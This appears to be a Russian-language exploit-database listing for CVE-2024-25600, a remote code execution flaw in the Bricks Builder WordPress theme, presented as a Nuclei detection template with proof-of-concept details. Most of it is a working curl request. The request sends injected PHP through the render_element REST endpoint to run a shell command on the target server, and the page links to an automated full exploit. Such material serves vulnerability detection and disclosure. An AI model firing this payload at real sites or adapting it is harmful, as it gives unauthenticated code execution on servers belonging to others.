## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CHRISTBOWEL-CVE-2024-25600_NUCLEI-TEMPLATE
# CVE-2024-25600_Nuclei-Template
Шаблон Nuclei и информация о PoC для CVE-2024-25600
## Описание 📝
Тема Bricks для WordPress уязвима к удаленному выполнению кода во всех версиях до 1.9.6 включительно. Это позволяет неаутентифицированным злоумышленникам выполнять код на сервере. Этот шаблон 🛠️ предназначен для обнаружения уязвимости CVE-2024-25600 🕳️, найденной в плагине Bricks Builder для WordPress, с помощью nuclei. Уязвимость позволяет неаутентифицированное удаленное выполнение кода на атакованных веб-сайтах 💻.
## Доказательство концепции (PoC) 📝
Полный PoC (автоматический) доступен по адресу https://github.com/chocapikk/CVE-2024-25600.
Базовый PoC, предоставленный в раскрытии, выглядит следующим образом:
root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'